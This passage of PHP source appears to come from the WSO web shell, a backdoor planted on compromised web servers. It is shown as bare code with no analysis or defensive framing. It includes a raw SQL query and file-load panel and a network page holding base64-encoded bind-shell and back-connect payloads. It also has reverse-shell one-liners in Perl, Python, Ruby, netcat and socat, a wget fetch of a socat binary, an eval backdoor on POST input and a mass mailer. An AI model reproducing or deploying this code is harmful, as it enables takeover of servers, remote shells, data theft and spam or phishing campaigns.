1179 $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
1180 break;
1181 case 'odbc':
1182 $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' ORDER BY 1 OFFSET ' . ($_POST['p3'] * 30) . ' ROWS FETCH NEXT 30 ROWS ONLY';
1183 break;
1184 default:
1185 $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
1186 break;
1187 }
1188 echo '<br><br>';
1189 }
1190 if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1191 $db->query(@$_POST['p2']);
1192 if ($db->res !== false) {
1193 $title = false;
1194 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1195 $line = 1;
1196 while ($item = $db->fetch()) {
1197 if (!$title) {
1198 echo '<tr>';
1199 foreach ($item as $key => $value) echo '<th>' . $key . '</th>';
1200 reset($item);
1201 $title = true;
1202 echo '</tr><tr>';
1203 $line = 2;
1204 }
1205 echo '<tr class="l' . $line . '">';
1206 $line = $line == 1 ? 2 : 1;
1207 foreach ($item as $key => $value) {
1208 if ($value == null) echo '<td><i>null</i></td>';
1209 else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
1210 }
1211 echo '</tr>';
1212 }
1213 echo '</table>';
1214 } else {
1215 echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
1216 }
1217 }
1218 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;mg(document.sf);return false;' name= 'querybox'><textarea name='query' style='width:100%;height:100px'>";
1219 if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']);
1220 echo "</textarea><br><input type=submit value='Execute'><button type='button' onclick='d.sf.p1.value=\"querydl\";d.sf.p2.value=d.querybox.query.value;mg(document.sf);return false;'>Execute and Download</button></form></td></tr>";
1221 }
1222 echo '</table></form><br>';
1223 if ($_POST['type'] == 'mysql' || $_POST['type'] == 'mysqli') {
1224 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1225 if ($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;mg(document.sf);return false;'><span>Load file</span><input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1226 }
1227 if (@$_POST['p1'] == 'loadfile') {
1228 $file = $db->loadFile($_POST['p2']);
1229 echo '<br><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
1230 }
1231 } else {
1232 echo htmlspecialchars($db->error());
1233 }
1234 echo '</form></div>';
1235 wsoFooter();
1236 }
1237 function actionNetwork() {
1238 wsoHeader();
1239 $bind_port_p = 'IyEvdXNyL2Jpbi9wZXJsCiRTSEVMTD0iL2Jpbi9zaCAtaSI7dXNlIFNvY2tldDtzb2NrZXQoUywmUEZfSU5FVCwmU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKTtzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7YmluZChTLHNvY2thZGRyX2luKCRBUkdWWzBdLElOQUREUl9BTlkpKTtsaXN0ZW4oUywzKTt3aGlsZSgxKXthY2NlcHQoQ09OTixTKTtpZighKCRwaWQ9Zm9yaykpe2RpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTtvcGVuIFNURElOLCI8JkNPTk4iO29wZW4gU1RET1VULCI+JkNPTk4iO29wZW4gU1RERVJSLCI+JkNPTk4iO2V4ZWMgJFNIRUxMO2Nsb3NlIENPTk47ZXhpdCAwO319Cg==';
1240 $back_connect_php = 'c2V0X3RpbWVfbGltaXQoMCk7JHc9bnVsbDtpZihmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSl7JHA9cGNudGxfZm9yaygpO2lmKCRwfHwkcD09LTF8fHBvc2l4X3NldHNpZCgpPT0tMSlleGl0KCk7fTt1bWFzaygwKTskcz1mc29ja29wZW4oInoiLHEsJGVycm5vLCRlcnJzdHIsMzApO2lmKCEkcylleGl0KDEpOyRwcm9jPXByb2Nfb3BlbigndW5hbWUgLWE7aWQ7L2Jpbi9zaCAtaScsYXJyYXkoMD0+YXJyYXkoInBpcGUiLCJyIiksMT0+YXJyYXkoInBpcGUiLCJ3IiksMj0+YXJyYXkoInBpcGUiLCJ3IikpLCRwKTtpZighaXNfcmVzb3VyY2UoJHByb2MpKWV4aXQoMSk7c3RyZWFtX3NldF9ibG9ja2luZygkcFswXSwwKTtzdHJlYW1fc2V0X2Jsb2NraW5nKCRwWzFdLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHBbMl0sMCk7c3RyZWFtX3NldF9ibG9ja2luZygkcywwKTt3aGlsZSgxKXtpZihmZW9mKCRzKXx8ZmVvZigkcFsxXSkpYnJlYWs7JHI9YXJyYXkoJHMsJHBbMV0sJHBbMl0pO3N0cmVhbV9zZWxlY3QoJHIsJHcsJHcsbnVsbCk7aWYoaW5fYXJyYXkoJHMsJHIpKWZ3cml0ZSgkcFswXSxmcmVhZCgkcywxNDAwKSk7aWYoaW5fYXJyYXkoJHBbMV0sJHIpKWZ3cml0ZSgkcyxmcmVhZCgkcFsxXSwxNDAwKSk7aWYoaW5fYXJyYXkoJHBbMl0sJHIpKWZ3cml0ZSgkcyxmcmVhZCgkcFsyXSwxNDAwKSk7fTtmY2xvc2UoJHMpO2ZjbG9zZSgkcFswXSk7ZmNsb3NlKCRwWzFdKTtmY2xvc2UoJHBbMl0pO3Byb2NfY2xvc2UoJHByb2MpOwo=';
1241 $port = rand(1025, 65534); //randomising port cos firewalls
1242 echo "<h1>Network tools</h1><div class=content>
1243 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
1244 <span>Bind port to /bin/sh [perl]</span><br>
1245 Port: <input type='text' name='port' value='$port'> <input type=submit value='>>'>
1246 </form>
1247 <form name='nfp' onSubmit=\"g(null,null,this.bctype.value,this.server.value,this.port.value);return false;\">
1248 <span>Back-connect</span><br>
1249 Type: <select name='bctype'><option value='bcphp'>PHP</option><option value='bpp'>Perl</option><option value='bcpy'>Python</option><option value='bcpyudp'>Python UDP Socat</option><option value='bcpytcp'>Python TCP Socat</option><option value='bcuby'>Ruby</option><option value='bcnc'>Netcat</option><option value='bcsocat'>Socat TTY</option></select>
1250 Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='$port'> <input type=submit value='>>'>
1251 </form>
1252 <span>Netcat command (run this on your server)</span><br>nc -l -vv -p $port<br>
1253 <span>Socat command (TCP)</span><br>socat file:`tty`,raw,echo=0 tcp-listen:$port<br>
1254 <span>Socat command (UDP)</span><br>socat file:`tty`,raw,echo=0 udp-listen:$port<br>";
1255 if (isset($_POST['p1'])) {
1256 function cf($f, $t) {
1257 $w = @fopen($f, 'w') or @function_exists('file_put_contents');
1258 if ($w) {
1259 @fwrite($w, base64_decode($t));
1260 @fclose($w);
1261 }
1262 }
1263 $port = $_POST['p3']; //except for bind
1264 $addr = $_POST['p2'];
1265 switch ($_POST['p1']) {
1266 case 'bpp':
1267 cf('/tmp/bp.pl', $bind_port_p);
1268 $out = wsoEx('perl /tmp/bp.pl ' . $_POST['p2'] . ' 1>/dev/null 2>&1 &');
1269 sleep(1);
1270 echo "<pre class=ml1>$out
1271" . wsoEx('ps aux | grep "bp.pl"') . '</pre>';
1272 unlink('/tmp/bp.pl');
1273 break;
1274 case 'bcp':
1275 $out = wsoEx("perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(" . $_POST['p3'] . ",inet_aton(\"" . $_POST['p2'] . "\")))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'");
1276 sleep(1);
1277 echo "<pre class=ml1>$out
1278" . wsoEx('ps aux | grep "perl -e"') . '</pre>';
1279 break;
1280 case 'bcpy':
1281 $out = wsoEx("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$addr\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");
1282 sleep(1);
1283 echo "<pre class=ml1>$out
1284" . wsoEx('ps aux | grep "python -c"') . '</pre>';
1285 break;
1286 case 'bcruby':
1287 $out = wsoEx("ruby -rsocket -e'f=TCPSocket.open(\"" . $addr . '",' . $port . ").to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'");
1288 sleep(1);
1289 echo "<pre class=ml1>$out
1290" . wsoEx("ps aux | grep 'ruby -rsocket'") . "</pre>";
1291 break;
1292 case 'bcnc':
1293 $out = wsoEx("nc -e /bin/sh $addr $port");
1294 sleep(1);
1295 echo "<pre class=ml1>$out
1296" . wsoEx("ps aux | grep 'nc -e'") . "</pre>";
1297 break;
1298 case 'bcphp':
1299 eval(str_replace('q', $port, str_replace('z', $addr, base64_decode($back_connect_php))));
1300 break;
1301 case 'bcpyudp':
1302 $out = wsoEx("python -c 'import os,pty,socket;esc=\"%s[\"%chr(27);color=esc+\"1;36m\";reset=esc+\"0m\";s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"$addr\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");os.putenv(\"HOME\",os.getcwd());os.putenv(\"PATH\",\"/usr/local/sbin:/usr/sbin:/sbin:/bin:/usr/local/bin:/usr/bin:\"+os.getenv(\"PATH\",\"\"));os.putenv(\"TERM\",\"linux\");os.putenv(\"PS1\",color+\"\u@\h:\w\$ \"+reset);pty.spawn(\"/bin/bash\");s.close()'");
1303 sleep(1);
1304 echo "<pre class=ml1>$out
1305" . wsoEx('ps aux | grep "python -c"') . '</pre>';
1306 break;
1307 case 'bcpytcp':
1308 $out = wsoEx("python -c 'import os,pty,socket;esc=\"%s[\"%chr(27);color=esc+\"1;36m\";reset=esc+\"0m\";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$addr\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");os.putenv(\"HOME\",os.getcwd());os.putenv(\"PATH\",\"/usr/local/sbin:/usr/sbin:/sbin:/bin:/usr/local/bin:/usr/bin:\"+os.getenv(\"PATH\",\"\"));os.putenv(\"TERM\",\"linux\");os.putenv(\"PS1\",color+\"\u@\h:\w\$ \"+reset);pty.spawn(\"/bin/bash\");s.close()'");
1309 sleep(1);
1310 echo "<pre class=ml1>$out
1311" . wsoEx('ps aux | grep "python -c"') . '</pre>';
1312 break;
1313 case 'bcsocat':
1314 $out = wsoEx("if [ `command -v socat` ]; then `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$addr:$port`;else if [ `uname -m` == x86_64 ]; then wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; else wget -q https://github.com/ernw/static-toolbox/releases/download/1.03/socat-x86 -O /tmp/socat; fi;chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$addr:$port; fi");
1315 sleep(1);
1316 echo "<pre class=ml1>$out
1317" . wsoEx("ps aux | grep socat") . "</pre>";
1318 unlink("/tmp/socat");
1319 break;
1320 }
1321 }
1322 echo '</div>';
1323 wsoFooter();
1324 }
1325 function actionRC() {
1326 if (!isset($_POST['p4'])) {
1327 $a = array('uname' => php_uname(), 'php_version' => phpversion(), 'wso_version' => '3', 'safemode' => @ini_get('safe_mode'));
1328 echo serialize($a);
1329 }
1330 eval($_POST['p4']);
1331 }
1332 function actionMailer() {
1333 wsoHeader();
1334 if (isset($_POST['emaillist'])) {
1335 $emaillist = $_POST['emaillist'];
1336 $from = $_POST['from'];
1337 $replyto = $_POST['replyto'];
1338 $subject = stripslashes($_POST['subject']);
1339 $realname = $_POST['realname'];
1340 $file_name = $_FILES['file']['name'];
1341 $file = $_FILES['file']['tmp_name'];
1342 $file_type = $_FILES['file']['type'];
1343 $contenttype = $_POST['contenttype'];
1344 $message = stripslashes(urldecode(str_replace('%5C%22', '%22', urlencode($_POST['message']))));
1345 }
1346 echo "<h1>Mass Mailer</h1><div class=content>
1347 <form name='mailform' method='post' onsubmit='mg(this);return false;' enctype='multipart/form-data'><table width='100%' border='0'><input type='hidden' name='a' value='Mailer'><tr><td width='10%' align='right'>From Email:</td><td width='18%'><input type='text' name='from' value='$from'></td><td width='31%' align='right'>From Name:</td><td width='41%'><input type='text' name='realname' value='$realname'></td></tr><tr><td width='10%' align='right'>Reply:</td><td width='18%'><input type='text' name='replyto' value='$replyto'></td><td width='31%' align='right'>Attach File:</td><td width='41%'><input type='file' name='file' size='30'></td></tr><tr><td width='10%' align='right'>Subject:</td><td colspan='3'><input type='text' name='subject' value='$subject' size='66'></td></tr><tr><td width='10%' valign='top' align='right'>Message:</td><td width='18%' valign='top'><textarea name='message' cols='50' rows='10'>$message</textarea><input name='contenttype' type='radio' value='plain'>Text<input name='contenttype' type='radio' value='html' checked>HTML<input type='submit' value='Send Emails'></td><td width='31%' valign='top' align='right'>Mail to:</td><td width='41%' valign='top'><textarea name='emaillist' cols='30' rows='10'>$emaillist</textarea></td></tr></table></form></div>";
1348 if ($emaillist) {
1349 if (!$from && !$subject && !$message) die('Please complete all fields before sending your message.');
1350 $allemails = split("
1351", $emaillist);
1352 $numemails = count($allemails);
1353 if ($file_name) {
1354 if (!file_exists($file)) die('The file you are trying to upload could not be copied to the server');
1355 $content = chunk_split(base64_encode(fread(fopen($file, 'r'), filesize($file))));
1356 $uid = strtoupper(md5(uniqid(time())));
1357 }
1358 for ($x = 0;$x < $numemails;$x++) {
1359 $to = $allemails[$x];
1360 if ($to) {
1361 $to = str_replace(' ', '', $to);
1362 print " $to.......";
1363 flush();
1364 $header = "From: $realname <$from>
1365Reply-To: $replyto
1366MIME-Version: 1.0
1367";
1368 if ($file_name) $header.= "Content-Type: multipart/mixed;boundary=$uid
1369--$uid
1370";
1371 $header.= "Content-Type: text/$contenttype
1372Content-Transfer-Encoding: 8bit
1373
1374$message
1375";
1376 if ($file_name) $header.= "--$uid
1377Content-Type: $file_type;name=\"$file_name\"
1378Content-Transfer-Encoding: base64
1379Content-Disposition: attachment; filename=\"$file_name\"
1380
1381$content
1382--$uid--";
1383 mail($to, $subject, "", $header);
1384 flush();
1385 }
1386 }
1387 }
1388 if (isset($_POST['emaillist']) && $numemails !== 0) {
1389 echo "<script>alert('Sending Complete
1390Total Email $numemails');</script>";
1391 }
1392 wsoFooter();
1393 }
1394 /* Choosing the page */
1395 if (empty($_POST['a'])) $_POST['a'] = 'FilesMan';
1396 if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']);
1397 exit;
1398